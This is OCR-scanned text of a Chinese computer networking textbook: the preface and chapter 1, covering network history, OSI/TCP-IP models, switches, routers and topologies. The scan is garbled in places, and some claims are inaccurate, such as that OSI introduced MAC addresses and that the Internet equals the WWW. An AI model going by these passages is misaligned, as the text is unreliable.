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随 着 计算 机 和 网 络 技术 的 飞速 发 展 , 人 类 已 经 步 和 人 信息 时 代 , 计 算 机 网 
络 已 广泛 应 用 于 各 行 各 业 , 完 全 改变 了 人 类 以 往 对 时 间 和 空间 的 观念 ,人 们 
足 不 出 户 就 可 了 解 天 下 大 事 , 远 隔 千里 又 县 尺 天 涯 ,从 而 使 世界 真正 变 成 一 
个 地 球 村 。 计 算 机 与 通信 技术 的 不 断 进 步 将 推动 着 计算 机 网 络 技术 的 发 展 ， 
新 概念 ,新 思想 、 新 技术 .新 型 信息 服务 也 不 断 涌现 。 计 算 机 网 络 课程 已 经 成 
为 高 等 院 校 计算 机 类 专业 的 基础 课 以 及 理工 类 和 经 管 类 专业 的 必修 课 。 

本 书 采 用 ”基于 工作 任务 "方法 阐述 计算 机 网 络 机 制 与 运行 原理 、 技 术 
与 应 用 ,以 真实 的 工作 任务 过 程 带动 具体 知识 点 的 展开 ,让 读者 能 与 身边 网 
络 应 用 紧密 联系 ,并 学 以 致 用 ,这 对 提高 读者 的 阅读 和 学 习 兴趣 是 十 分 重要 
的 ,也 是 编者 撰写 这 本 书 的 初衷 。 

本 书 内 容 是 在 编者 多 年 科学 研究 教学 研究 和 教学 实践 过 程 中 积累 、 修 
改 、 补 充 和 逐步 完善 的 。 其 在 讲述 时 结合 TCP/IP 协议 分 析 计 算 机 网 络 深 
层次 的 内 容 , 涉 及 计算 机 网 络 整 体 框 架 、 技 术 理 论 、 协 议 层次 、 安 全 技术 等 ; 
并 把 计算 机 网 络 的 原理 ,技术 与 应 用 融合 在 一 起 讲述 网 络 基础 理论 ; 同时 
结合 网 络 应 用 反映 最 新 的 网 络 理论 和 技术 知识 ,力求 讲 清楚 计算 机 网 络 协 
议 的 层次 在 哪里 ,网 络 协议 层次 如 何 捆绑 、 如 何 看 到 实际 的 网 络 协议 包 、 了 P 
协议 和 网 络 互联 的 核心 思想 以 及 网 络 中 的 寻 址 技术 和 路 由 技术 的 核心 内 
容 , 为 网 络 结构 网络 操 作 系 统 、 组 网 技术 、 网 络 运 行 管理 网络 应 用 及 网 络 
综合 布线 等 提供 理论 依据 。 

为 方便 教学 ,本 书 配套 有 相关 电子 课件 、 实 验 录 像 . 虚 拟 课本 、 在 线 实验 
和 讨论 答疑 网 络 课程 站 点 。 该 站 点 于 2011 年 荣获 第 十 五 届 全 国 多 媒体 教 
育 软件 大 赛 二 等 奖 ( 教 育 部 指导 .中 央 电教 馆 ) ,2012 年 获得 第 八 届 全 国 高 等 
学 校 计算 机 课件 大 赛 二 等 奖 ( 全 国 高 等 学 校 计算 机 课件 评比 评测 委员 会 )， 
2012 年 亲 选 为 省 精品 资源 共享 课程 (广东 省 教育 厅 )。 具 体 链 接地 址 如 下 。 

(1) 实用 网 络 技术 : http://www. gdcp. cn/jpkc/1f。 

(2) 网 络 攻防 与 安全 : http://www. gdcp. cn/jpkc/lf/security。 

由 于 时 间 仓促 和 编者 水 平 有 限 . 故 书 中 难免 存在 缺点 和 不 足 之 处 ,县 请 
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第 1 章 计算 机 网 络 基本 概念 


人 类 社会 已 经 进入 信息 化 时 代 , 计 算 机 文化 已 经 成 为 人 类 第 二 文化 。 计 算 机 网 络 因 其 
对 经 济 发 展 及 人 们 生活 方式 的 改变 在 整个 行业 中 异军突起 ; 目前 网 络 技术 已 经 应 用 到 各 行 
各 业 , 电 子 商 务 与 电子 政务 的 普及 更 使 网 络 成 为 信息 社会 的 支撑 平台 。 计 算 机 网 络 能 够 让 
任何 人 任何 地 方 、. 以 人 们 的 任何 感受 享用 任何 信息 ,计算 机 网 络 无 处 不 在 。 

计算 机 网 络 是 通信 技术 与 计算 相 结合 的 产物 。 所 谓 计 算 机 网 络 , 是 指 将 地 理 位 置 不 同 
的 具有 “自治 0” 能 力 的 计算 机 及 其 外 联 设 备 ,通过 通信 和 链 路 连接 起 来 ,在 操作 系统 、 网 络 管 
理 软件 及 通信 协议 的 支撑 和 协调 下 实现 资源 共享 和 信息 交互 2。 

计算 机 网 络 的 功能 主要 体现 在 3 个 方面 : 数据 通信 ,资源 共享 和 分 布 式 计算 。 

1. 数据 通信 

数据 通信 是 计算 机 网 络 最 基本 功能 ,用 于 实现 计算 机 与 终端 或 计算 机 与 计算 机 之 间 信 
息 的 传递 。 地 理 位 置 分 散 的 生产 单位 或 业务 部 门 可 通过 计算 机 网 络 连接 起 来 进行 集中 控制 
和 管理 ,例如 用 户 可 以 利用 网 络 传 送 电 子 邮 件 ,发布 消 息 、 聊 天 对 话 、 电 子 购物 、 远 程 教 育 等 。 

2, 资源 共享 

资源 是 指 构成 系统 的 所 有 要 素 , 包 括 软 硬 件 资源 ,如 计算 处 理 能 力 、 大 容量 磁盘 、 高 速 打 
印 机 、 绘 图 仪 .通信 线路 ,数据 库 、 文 件 和 其 他 计算 机 上 的 相关 信息 。 用 户 共享 网 络 中 的 各 种 
软 硬 件 资源 ,从 而 提高 整体 系统 的 利用 率 。 

3. 分 布 式 计算 

分 布 式 计算 是 将 一 项 完整 复杂 的 任务 划分 成 许多 子 任务 ,由 网 络 中 的 计算 机 协调 并 共 
同 完成 汇总 ,从 而 得 到 计算 结果 。 目 前 ,分 布 式 计 算 已 经 用 于 协调 网 络 中 计算 机 闲置 的 海量 
处 理 能 力 并 进行 云 计算 和 云 查 杀 ,全 球 SETI@home 项 目 利用 分 布 式 计算 分 析 来 自 外 太空 
的 电信 和 号 ,以 寻找 ,探索 可 能 存在 的 外 星 智慧 生命 。 

本 章 主要 介绍 计算 机 网 络 的 发 展 及 分 类 ,让 学 生 对 计算 机 网 络 的 定义 、 功 能 和 发 展 趋势 
有 大 致 了 解 ,更 深入 的 知识 将 会 在 后 续 章 节 中 详细 讲述 。 


1. 知识 目标 
(1) 识 记 计算 机 网 络 的 定义 。 
(2) 识 记 OSI 七 层 参 考 模型 名 称 。 


@ 自治 : 指 每 台 计算 机 工作 都 是 独立 的 ,任何 一 台 计 算 机 都 不 能 干预 其 他 计算 机 的 工作 ,任意 两 台 计 算 机 之 间 没 
有 主 从 关系 。 

@ ”信息 交互 : 要 接 人 一 个 网 络 必 须 有 物理 连接 和 逻辑 连接 。 物 理 连接 包括 通信 设备 和 线路 ,如 交换 机 、 路 由 器 、 双 
绞 线 等 ; 逻辑 连接 包括 TCP/IP 配置 .浏览 器 .网 络 管理 软件 等 。 最 终 接 人 网 络 的 目的 是 实现 资源 共享 和 信息 交互 。 


[到 各 区 玉 关 考 安全 


(3) 理解 计算 机 网 络 分 类 及 划分 依据 。 
(4) 理解 多 路 数字 信号 冲撞 的 原因 。 

2. 能 力 目标 

(1) 理解 交换 机 和 路 由 器 的 用 途 和 功能 。 
(2) 识 记 交换 机 指示 灯 的 含义 。 

(3) 识 记 交换 机 和 路 由 器 的 工作 层次 。 


1.1 计算 机 网 络 的 发 展 


工作 任务 一 认识 网 络 设备 


工作 目的 

认识 交换 机 和 路 由 器 。 

工作 任务 

小 张 新 任 企业 网 络 管理 员 ,需要 熟悉 公司 网 络 产品 ,并 了 解 网 联 设备 功能 、 接 口 和 指示 
灯 含 义 。 

任务 分 析 

交换 机 和 路 由 器 是 基本 的 网 络 互联 设备 。 交 换 机 端口 比 路 由 器 多 ,用 于 接 人 计算 机 组 
成 局 域 网 ; 而 路 由 器 用 于 连接 不 同 交换 机 ,将 局 域 网 互联 成 广域网 。 

工作 环境 和 工具 

二 层 交 换 机 和 路 由 器 各 1 台 。 


工作 过 程 
(1) 启动 二 层 交 换 机 ,注意 观察 交换 机 型 号 .接口 和 指示 灯 作 用 ,如 图 1-1 所 示 。 


端口 指示 灯 


电源 指示 灯 


图 1-1 交换 机 接口 


@ 交换 机 型 号 : S2126。S: 表示 交换 机 Switch,2126 是 具体 型 号 ,其 中 第 一 个 2 表示 
二 层 交 换 机 ,涉及 OSI 参考 模型 物理 层 和 数据 链 路 层 。 

@ 交换 机 接口 。 

a。 以 太 网 接口 : S2126 共有 24 个 以 太 网 (FastEthernet) 接 口 ,每 个 接口 都 有 唯一 标识 ， 
第 一 个 接口 是 F 0/1 口 ,第 二 个 接口 是 F 0/2 口 ,以 此 类 推 。 

b. Console 口 : Console 接口 也 称 为 配置 接口 ,用 于 通过 命令 行 配置 交换 机 。 

@ 交换 机 指示 灯 。 交 换 机 以 太 网 接口 有 两 种 指示 灯 ,分 别 是 Link/ACT 指示 灯 和 速率 
指示 灯 , 如 图 1-2 所 示 。 
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图 1-2 交换 机 指示 灯 


a. Link/ACT 指示 灯 。 
。 亮 : 表示 检测 到 网 线 连接 (绿色 ) 。 
。 灭 : 无 连接 。 
b. 闪烁 : 有 数据 传输 。 
c,，100Mbps 速率 指示 灯 。 
。 亮 : 当前 端口 传输 速率 为 100Mbps( 橘 色 ) 。 
。 灭 : 当前 端口 传输 速率 为 10Mbps。 
(2) 启动 路 由 器 ,注意 观察 交换 机 型 号 .接口 和 指示 灯 作 用 ,如 图 1-3 所 示 。 
@ 路 由 器 型 号 ，RSR10。R: 表示 路 由 器 
Router, 路 由 器 涉及 OSI 参考 模型 物理 层 、 数 据 链 


路 层 和 网 络 层 。 

@ 路 由 器 接口 。 

a 以 太 网 接口 RSR10 系列 路 由 器 有 两 个 以 QonsoleHll, POD PN 
太 网 口 ,分 别 是 F 0/0 口 和 下 0/1 口 ,用 于 接 入 不 图 1-3 路 由 器 接口 
同 局 域 网 交换 机 。 


b. 串口 : RSR10 系列 路 由 器 背面 有 两 个 串口 (Serier) ,分 别 是 Sl 口 和 S2 口 ,用 于 与 远 
程 路 由 器 连接 ,组 成 广域网 。 

c，Console 口 : Console 接口 也 称 为 配置 接口 ,用 于 通过 命令 行 配置 路 由 器 。 

@ 路 由 器 指示 灯 。 

a. 串口 指示 灯 : Sl 或 S2 灯亮 表示 与 远程 路 由 器 串口 已 连接 。 

b. 以 太 网 指示 灯 分 为 Link/ACT 指示 灯 和 100Mbps 速率 指示 灯 ,与 交换 机 类 似 。 

(3) 连接 交换 机 和 路 由 器 。 换 机 用 于 接 人 计算 机 组 成 局 域 网 ,而 路 由 器 用 于 连接 不 同 
交换 机 ,将 局 域 网 互联 成 广域网 ,如 图 1-4 所 示 。 


串口 线 缆 
S1/0 
路 由 器 路 由 器 
FO0/0 


交换 机 交换 机 


广州 北京 


图 1-4 交换 机 和 路 由 器 连接 示意 图 
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任 甸 总结 话 


交换 机 用 于 : 


路 由 器 用 于 : 


随 着 人 类 步 入 信息 化 社会 ,计算 机 网 络 已 经 成 为 制约 生产 力 发 展 的 重要 因素 。 什 么 是 
计算 机 网 络 ? 它 是 如 何 发 展 起 来 的 呢 ? 计算 机 网 络 起 源 于 美 苏 冷 战 ,从 产生 发展 到 成 熟 ， 
总 体 可 以 划分 为 4 个 阶段 。 

1. 第 一 阶段 : 以 主机 为 中 心 的 计算 机 网 络 

20 世纪 60 年 代 初 ,美国 国防 部 为 保证 防御 武装 系统 在 受到 苏联 核 打 击 后 仍然 具有 生 
存 和 反击 能 力 , 开 发 出 半自动 地 面 防 空 系统 (Semi-Automatic Ground Environment， 
SAGE) 。 半 自动 地 面 防 空 系统 将 众多 雷达 和 测控 设备 经 由 线路 汇集 至 一 台 IBM 计算 机 上 
集中 处 理 与 控制 , 当 部 分 雷达 被 摧毁 后 ,计算 机 仍然 能 够 协调 其 余 雷 达 正常 工作 。 以 主机 为 
中 心 的 计算 机 网 络 拓扑 结构 如 图 1-5 所 示 。 从 此 ,计算 机 技术 开始 与 现代 通信 相 结合 ,产生 
一 门 新 兴 科 学 一 一 计算 机 网 络 技 术 。 第 一 代 计 算 机 网 络 具有 以 下 特点 。 

(1) 多 个 终端 共享 中 心 主机 软 硬 件 资源 ,中 心 主机 的 性 能 决定 整个 网 络 的 性 能 。 

(2) 中 心 主机 需要 承担 数据 处 理 和 通信 双重 任务 ,主机 负担 很 重 。 

(3) 终端 设备 若 要 加 入 网 络 , 则 必须 通过 专线 接 入 中 心 主机 ,线路 利用 率 低 。 

(4) 网 络 可 靠 性 低 , 中 心 主机 的 竣 痰 会 导致 整个 网 络 的 不 可 用 。 

2. 第 二 阶段 : 从 主机 到 主机 的 计算 机 网 络 

1969 年 ,美国 国防 部 资助 建立 阿 帕 网 (ARPANET) ,将 位 于 洛杉矶 的 加 利 福 尼 亚 大 学 、 
圣 芭 芭 拉 的 斯 坦 福 大 学 以 及 位 于 盐湖 城 的 犹他 州 州立 大 学 3 所 大 学 的 计算 机 连接 起 来 , 通 
过 通信 处 理 机 相连 。 阿 帕 网 是 Internet 最 早 的 锥 形 , 从 主机 到 主机 的 计算 机 网 络 拓扑 结构 
如 图 1-6 所 示 。 从 主机 到 主机 的 计算 机 网 络 具有 以 下 特点 。 
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a 
图 1-5 以 主机 为 中 心 的 图 1-6 从 主机 到 主机 的 
计算 机 网 络 拓扑 结构 计算 机 网 络 拓扑 结构 


第 1 章 ， 计算 机 网 络 基本 概念 


(1) 数据 通信 任务 首次 从 计算 机 分 离 , 由 通信 处 理 机 承担 ,减轻 中 心 主机 负荷 。 

(2) 降低 网 络 接 入 成 本 ,提高 通信 线路 利用 率 。 任 何 主机 只 要 和 通信 处 理 器 连接 即 可 
与 网 络 中 其 他 计算 机 通信 。 

(3) 由 于 网 络 没有 采用 统一 体系 结构 ,因此 不 同 厂商 的 计算 机 由 于 接 入 设备 不 同 ,所 使 
用 的 协议 也 不 一 样 ,即使 所 处 同一 网 络 也 不 能 通信 @。 

到 1972 年 , 阿 帕 网 上 接 入 的 节点 已 经 达到 40 多 个 ,网 点 彼此 之 间 主 要 传送 小 文本 文件 
(电子 邮件 ) 。 此 后 随 着 节点 数量 不 断 增 多 ,由 于 缺乏 统一 标准 , 故 不 同类 型 的 计算 机 不 能 相 
互通 信 。 为 此 ,美国 国防 部 开始 着 手 研 究 异 构 主 机 之 间 的 互联 问题 ,引发 第 三 代 计 算 机 
网 络 。 

3. 第 三 阶段 : 开放 式 标准 化 网 络 

1984 年 ,国际 标准 化 组 织 (International Standards Organization ,ISO) 提出 开放 系统 互 
联 参考 模型 (Open System Interconnection Basic Reference Model,OSI) ,OSI 参考 模型 制定 
一 系列 协议 标准 ,其 实质 是 一 个 庞大 的 协议 集 。 它 将 网 络 结构 划分 为 7 层 , 各 层 之 间 功 能 相 
互 独立 ,各 司 其 职 , 从 而 将 一 个 复杂 的 网 络 体系 划分 成 若干 个 子 系统 ,并 统一 各 层 协议 标准 。 
OSI 首次 引入 Mac@ 地 址 ,以 解决 同一 网 络 不 同类 型 主机 之 间 的 通信 问题 。OSI 参考 模型 
结构 图 如 图 1-7 所 示 。 


发 送 方 叔 接收 方 如 


应 用 层 应 用 层 
| 

表示 层 
nl 古 
会 话 层 

是 

传输 层 
网 络 层 


a 
数据 链 路 层 Se 
物理 层 


图 1-7 OSI 参考 模型 结构 图 


OSI 参考 模型 基于 Mac 地 址 ,但 是 只 能 实现 同一 网 络 不 同 主机 之 间 的 互联 ,不 能 解决 
异 构 网 络 主机 之 间 的 通信 。 这 是 由 于 不 同 主机 间 通 过 查询 对 方 Mac 地 址 转发 策略 会 限制 
网 络 规模 ,而 主机 要 从 一 个 很 大 的 Mac 地 址 表 中 找 出 一 条 符合 的 记录 会 降低 转发 速率 。 


@ 例如 有 些 厂商 将 数字 *0" 调 制 成 一 5V ,而 有 些 厂商 调制 成 OV, 这 会 导致 彼此 信和 号 不 可 识别 成 ,即使 接 入 同一 网 
络 也 不 能 相互 通信 

@ ”Mac 地 址 也 称 为 物理 地 址 ,用 于 标识 网 络 内 不 同 计算 机 。 例如, 局域网 内 部 主机 、 手 机 蓝牙 之 间 的 通信 就 是 基 
于 Mac 地 址 的 。 
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Mac 地 址 表 过 大 问题 的 解决 方法 是 将 计算 机 划分 到 不 同 网 络 ,网 络 之 间 相 互 独立 ,但 这 又 
导致 了 异 构 网 络 之 间 主 机 不 能 通信 。 为 解决 这 一 不 足 ,20 世纪 80 年 代 末 美国 国防 部 在 主 
机 Mac 地 址 的 基础 上 引入 网 络 IP 地 址 ,改进 为 TCP/IP 参考 模型 ,并 从 7 层 体系 结构 压缩 
为 4 层 ,OSI 与 TCP 参考 模型 的 区 别 如 图 1-8 所 示 。 在 TCP/IP 参考 模型 中 ,网 络 地 址 用 
IP 地 址 标识 ,网 络 内 部 主机 用 Mac 地 址 标识 ,从 而 实现 异 构 网 络 主机 之 间 的 互联 。 


应 用 层 
a 
表示 层 。 | 高 三 层 应 用 层 
El 
会 话 层 
| 
传输 层 传输 层 
= 
网 络 层 网 际 层 
RE 
数据 链 路 层 
i 网 络 接口 层 
物理 层 
OSI 参 考 模型 TCP/IP 参 考 模型 


图 18 OSI 与 TCP 参考 模型 的 区 别 


4. 第 四 阶段 : 三 网 融合 互联 阶段 

在 TCP/IP 网 络 体系 推出 后 ,计算 机 网 络 一 直 沿 着 标准 化 方向 发 展 , 遵 循 TCP/IP 协议 
的 各 种 设备 ,如 计算 机 、 手 机 `GPS、 平 板 电脑 各 种 手持 设备 都 能 接 入 互联 网 。TCP/IP 参 
考 模型 将 通信 网 .广播 网 0 和 计算 机 网 络 技术 合 而 为 一 ,在 物理 层 形成 无 颖 覆盖 ,网 络 层 互 
联 互 通 , 应 用 层 实现 各 种 业务 渗透 和 交叉 。 


1.2 计算 机 网 络 的 定义 与 分 类 


1.2.1 计算 机 网 络 的 定义 


所 谓 计算 机 网 络 ,是 利用 通信 设备 和 线路 将 功能 独立 的 多 个 计算 机 互联 起 来 ,通过 功能 
完善 的 管理 软件 实现 网 络 中 资源 共享 和 信息 交互 。 这 里 要 注意 以 下 几 点 。 

(1) 网 络 连 接 包括 物理 连接 和 逻辑 连接 。 物 理 连 接 包 括 各 种 通信 设备 和 线路 。 通 信 设 
备 有 网 卡 、 集 线 器 、 交 换 机 和 路 由 器 等 ,这 些 将 会 在 后 续 章 节 详细 讲述 ; 线路 有 双 绞 线 、 电 话 
线 、 同 轴 电 缆 和 光纤 等 。 

(2) 功能 独立 的 计算 机 是 指 具 有 自主 处 理 能 力 的 计算 机 或 处 理 设备 ,设备 之 间 不 存在 
主 从 关系 。 例 如 ,计算 机 和 手机 之 间 通 信 属 于 计 网 络 网 络 范畴 ;， 而 计算 机 通过 电缆 连接 的 
打印 机 、 扫 描 仪 等 不 属于 计算 机 网 络 范畴 ,因为 它们 之 间 属 于 主 从 关系 。 


@ 广播 网 是 一 节点 发 送 .、 所 有 节点 都 能 接收 的 网 络 ,如 有 线 电 视 网 。 


第 1 章 计算 机 网 络 基本 入 区 | 


1.2.2 计算 机 网 络 的 分 类 


1. 根据 地 理 覆 盖 范 围 划分 

计算 机 网 络 依据 不 同 标准 可 以 划分 为 不 同类 型 的 网 络 。 根 据 地 理 覆 盖 范 围 大 小 可 以 划 
分 为 局 域 网 LAN(Local Area Network) , 城 域 网 MAN(Metropolitan Area Network) 、 广 域 
网 WANCWide Area Network) 和 因特网 (Internet) 。 

局 域 网 LAN 是 在 小 范围 内 将 计算 机 连接 起 来 ,实现 资源 管理 ,文件 .打印 机 共享 等 功 
能 。 局 域 网 覆盖 范围 一 般 在 几米 至 几 千 米 以 内 ,产权 归属 个 人 或 单位 所 有 。 局 域 网 覆盖 范 
围 较 小 ,不 涉及 远程 通信 和 路 由 选择 功能 ,具有 传输 速度 高 . 误 码 率 低 的 特点 ,因此 局 域 网 内 
部 主机 之 间 的 数据 传输 一 般 不 进行 纠 错 。 

城 域 网 MAN 本 质 上 是 一 种 大 型 的 局 域 网 ,可 以 看 成 是 局 域 网 的 延伸 。 城 域 网 将 一 个 
城市 内 的 局 域 网 彼此 相连 ,范围 从 几 千 米 到 几 十 千 米 不 等 ,覆盖 一 个 城市 和 地 区 。 

广域网 WAN 将 城 域 网 相连 ,覆盖 范围 从 几 十 千 米 到 几 万 千 米 ,实现 城市 与 城市 之 间 、 
国家 与 国家 之 间 、 洲 际 与 洲际 之 间 的 通信 ,传输 介质 主要 是 光纤 ,也 有 微波 ,如 中 国 和 日 本 通 
过 铺设 海底 光纤 进行 通信 。 广 域 网 由 于 传输 距离 远 ,造价 昂贵 ,产权 归属 于 营造 者 ,如 中 国 
电信 ,中 国 铁通 和 网 通 等 。 

因特网 也 称 万 维 网 (World Wide Web, WWW), 它 将 全 球 广域网 连接 在 一 起 ,在 本 质 上 
属于 广域网 范畴 ,可 以 看 成 是 一 个 典型 巨大 的 广域网 。 因 特 网 基于 TCP/IP 参考 模型 ,不管 
来 自 哪 个 国家 、 哪 个 民族 ,也 不 管 身 处 何 地 ,凡是 遵循 TCP/IP 协议 的 各 种 接 入 设备 都 能 接 
人 因特网 。 

2. 根据 拓扑 结构 划分 

网 络 拓扑 结构 是 指 网 络 中 节点 的 连接 方法 和 形式 。 不 同 拓扑 结构 有 不 同 的 介质 访问 方式 
和 特点 ,可 以 应 用 于 特定 场合 。 网 络 拓扑 结构 主要 有 总 线 型 . 星 形 .环形 、 树 型 和 网 状 型 5 种 。 

(1) 总 线 型 网 络 拓扑 结构 

总 线 型 拓扑 结构 网 络 采 用 同 轴 电 缆 作为 传输 介质 ,计算 机 通过 了 型 接口 接 入 数据 总 
线 , 从 而 接 入 总 线 型 网 络 ,如 图 1-9 所 示 。 

总 线 型 网 络 是 一 种 广播 网 ,一 节点 发 送 数 据 其 他 
节点 都 能 接收 ,因为 电缆 物理 上 将 所 有 计算 机 连接 在 
一 起 ,电流 流 经 导体 向 四 周 发 散 , 使 得 所 有 节点 都 能 接 
收 到 数据 。 例 如 节点 1 通过 总 线 向 节点 2 发 送 数据 ,网 
络 上 所 有 节点 ,如 节点 3、4 和 5 都 能 接收 ,但 会 因 地 址 
不 吻合 被 网 卡 丢 弃 ; 此 时 假如 节点 3 也 向 节点 4 传输 
数据 ,其 发 出 的 数字 信号 会 与 节点 1 的 数字 信号 冲撞 导 图 1-9 总 线 型 拓扑 结构 图 
致 数据 出 错 。 


生 F ant 
何谓 数字 信号 的 冲撞 


一 条 信道 不 管 多 粗 多 细 ,都 只 能 传输 一 路 的 数字 信号 。 假 如 同时 传输 多 路 数字 信号 ,会 
导致 数据 冲撞 现象 ,形象 地 讲 就 是 信号 撞车 。 数 字 信 号 的 冲撞 如 图 1-10 所 示 。 
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图 1-10 数字 信号 的 冲撞 


由 图 1-10 可 得 ,将 十 5V 定义 为 数字 “1”,0V 定义 为 数字 *0”, 主 机 1 和 主机 2 同时 向 总 
线 发 送 数 据 。 第 一 周期 主机 1 的 0V 与 主机 2 的 十 5V 苔 加 为 十 5V, 第 二 周期 主机 1 的 
十 5V 与 主机 2 的 0V 司 加 为 十 5V, 第 三 周期 主机 1 的 十 5V 与 主机 2 的 十 5V 起 加 为 十 5V， 
如 此 类 推 , 若 多 个 数字 信号 同时 传输 则 会 导致 接收 方 所 有 周期 接收 到 的 信号 都 是 十 5V 高 
电 平 , 即 数据 全 是 “1”。 

(由 思考 : 一 条 信道 能 传 给 多 路 的 模拟 信号 吗 ? 

总 线 型 网 络 拓 扑 结构 的 特点 如 下 。 

@ 优点 : 多 个 节点 共享 单一 信道 ,结构 简单 ,价格 低廉 ,安装 方便 。 

@ 缺点 : 属于 广播 网 络 ,一 节点 发 送 数 据 其 他 节点 只 能 等 待 ,总 线 利用 率 不 高 ,总 线 故 
障 会 导致 整个 网 络 的 瘫痪 。 

(2) 星 形 网 络 拓扑 结构 

星 形 折 扑 结构 是 目前 局 域 网 中 应 用 最 为 广泛 的 拓扑 结构 ,多 个 主机 共同 接 入 中 心 交换 
节点 ,数据 经 由 中 心 交换 节点 (由 集线器 或 者 交换 机 充当 ) 转 发 ,如 图 1-11 所 示 。 

在 星 形 拓扑 结构 中 ,中 心 节点 性 能 决定 整个 网 络 的 
性 能 ,单个 主机 故障 或 性 能 低下 不 会 影响 到 整个 网 络 的 
运行 状态 ,主机 加 入 撤离 网 络 简单 。 例 如 , 若 主机 5 要 
加 入 星 形 局 域 网 , 则 只 需 加 入 中 心 交换 节点 即 可 。 星 形 
结构 网 络 是 否 属于 广播 网 络 决定 于 中 心 节点 性 质 ,假如 
中 心 交换 节点 是 集线器 , 则 一 节点 发 送 数据 所 有 节点 都 
能 接收 ,用 集线器 组 成 的 星 形 网 络 属于 广播 网 络 ; 假如 
中 心 节点 是 交换 机 ,通过 查找 Mac 地 址 表 转 发 数据 至 相 
图 111 星 形 拓扑 结构 图 应 端口 ,一 个 主机 发 送 数 据 不 会 广播 到 所 有 端口 上 , 则 

用 交换 机 组 成 的 星 形 网 络 不 属于 广播 网 络 。 

@ 优点 : 单个 主机 故障 不 影响 全 网 ,主机 加 入 撤离 网 络 简单 。 

@ 缺点 : 中 心 交换 节点 的 故障 将 导致 整个 网 络 的 瘫 站 。 

(3) 环形 网 络 拓 扑 结构 

在 环形 拓扑 结构 网 络 中 ,中 继 器 两 两 相连 组 合成 闭合 环形 链 路 ,主机 只 要 接 入 任 一 中 继 
器 即 可 接 入 环形 网 络 , 如 图 1-12 所 示 。 

环形 网 中 所 有 主机 共享 单一 环形 闭合 物理 通道 ,数据 在 闭合 环 路 中 通过 中 继 器 逐一 转 
发 ,网 络 中 所 有 接 入 中 继 器 的 计算 机 都 能 接收 到 数据 ,但 会 因 地 址 不 吻合 而 丢弃 ,因此 环形 
网 络 属于 广播 网 络 。 例 如 主机 1 要 把 数据 发 送 给 主机 2, 数 据 在 闭合 环 路 中 北 时 针 绕 了 一 
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图 1-12 环形 拓扑 结构 图 


圈 , 通 过 中 继 器 广播 至 网 络 中 所 有 主机 ,最 后 由 发 送 方 (主机 1) 回收 ,以 广播 方式 将 数据 发 
送 给 主机 2。 

@ 优点 : 单个 主机 故障 不 影响 全 网 ,主机 加 入 或 离开 网 络 比 较 简单 。 

@ 缺点 : 环形 网 络 性 能 随 着 网 络 规 模 的 增 大 而 降低 ,因为 规模 越 大 ,闭合 环 路 的 中 继 
器 数量 越 多 ,数据 要 绕 一 个 大 圈 由 发 送 方 回收 ,影响 传输 效率 。 

(4) 树 型 网 络 拓 扑 结 构 

树 型 网 络 拓扑 结构 可 以 看 成 是 星 形 网 络 的 延伸 和 扩充 。 整 个 网 络 有 唯一 根 节点 , 根 节 
点 与 星 形 网 络 的 中 心 节点 级 联 构成 树 型 网 络 结构 ,如 图 1-13 所 示 。 


子 中 心 节点 


图 1-13 树 型 拓扑 结构 图 


在 树 型 网 络 中 ,只 有 一 个 根 中 心 交换 节点 ,但 可 以 有 多 个 子 中 心 节点 ,每 个 子 中 心 节点 
还 可 以 有 下 属 节点 ,整个 拓扑 结构 犹如 一 棵 树 ,形象 地 被 称 为 树 型 网 络 。 主 机 只 要 接 入 任 一 
子 中 心 节点 即 可 接 入 树 型 网 络 。 树 型 网 络 结构 是 否 属于 广播 网 络 取 决 于 根 节点 和 中 心 节点 
性 质 , 假 如 所 有 节点 包括 根 节点 都 是 集线器 , 则 整个 网 络 属于 广播 网 络 ; 假如 根 节点 是 交换 
机 ,部 分 中 心 节点 是 集线器 , 则 整个 网 络 不 属于 广播 网 络 ,但 部 分 枝 节 存 在 广播 现象 。 

@ 优点 : 树 型 网 络 扩充 节点 方便 灵活 。 

@ 缺点 : 树 型 网 络 中 单个 中 心 节点 故障 不 会 导致 整个 网 络 的 瘫痪 ,但 会 导致 其 下 层 节 
点 的 不 可 用 。 

总 线 型 . 星 形 、 环 形 和 树 型 网 络 都 可 以 组 建 局 域 网 ,但 在 组 网 过 程 中 必须 结合 实际 和 需 
求 选择 适合 的 拓扑 结构 。 目 前 , 星 形 和 树 型 网 络 以 其 卓越 的 性 能 和 容错 性 广泛 应 用 于 校园 
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网 和 企业 网 之 中 。 

(5) 网 状 型 拓扑 结构 

网 状 型 拓扑 也 称 为 分 布 型 网 络 拓扑 ,是 广域网 采用 的 组 网 方式 。 网 络 中 的 中 间 节 点 (由 
路 由 器 充当 ) 与 其 他 节点 相连 ,路 由 器 必须 根据 当前 网 络 带宽 和 拥塞 情况 动态 计算 路 径 开 
销 , 找 到 一 条 通 往 目的 主机 的 最 优 路 径 , 如 图 1-14 所 示 。 


SEE 接收 方 (北京 ) 
国 


发 送 方 (广州 ) 


路 由 器 
图 1-14 网 状 型 拓扑 结构 图 


网 状 型 拓扑 结构 具有 和 较 高 的 健壮 度 和 可 靠 性 ,因为 发 送 方 和 接收 方 之 间 存 在 多 条 通路 


可 供 选 择 。 但 是 ,其 结构 复杂 ,路 由 计算 会 带 来 数据 转发 延迟 ,另外 路 由 硬件 成 本 较 高 ,不易 
于 管理 和 维护 , 故 不 用 于 局 域 网 组 网 之 中 。 


3. 根据 资源 共享 方式 划分 

计算 机 网 络 根据 资源 共享 方式 可 以 划分 为 对 等 网 和 客户 机 /服务 器 网 络 。 

(1) 对 等 网 

在 对 等 网 中 ,每 个 计算 机 都 拥有 完全 平等 的 权限 , 既 可 以 共享 自身 资源 ,也 可 以 享用 其 
他 计算 机 资源 ,适用 于 组 建 小 规模 流量 不 大 的 局 域 网 。 例 如 通过 交换 机 组 成 的 星 形 局 域 网 ， 
计算 机 之 间 都 是 对 等 关系 。 组 建 对 等 网 络 很 简单 ,只 要 把 网 络 中 计算 机 设置 相同 的 IP 段 和 
子 网 掩 码 即 可 。 如 图 1-15 所 示 ,主机 1 和 主机 2 的 IP 都 属于 192.168.1 网 段 ,但 主机 号 不 


能 重复 ,一 个 是 10, 另 一 个 是 110, 子 网 掩 码 都 是 255. 255. 255. 0, 此 时 双方 主机 网 络 号 相 
同 ,属于 同一 子 网 中 ,可 以 相互 通信 并 共享 资源 。 


Internet 协议 (ICP/IP》 属性 
额 | 二 
如 持 此 功能 ， 则 可 以 获取 自 到 JP 设置 。 否则 ， y 民 设置 。 和 
如 和 你 人 下 泪 哑 大 站 清和 入 证 “二 
人 自动 获得 匡 地 址 四 ) 侣 自动 获得 匡 地 址 @) 
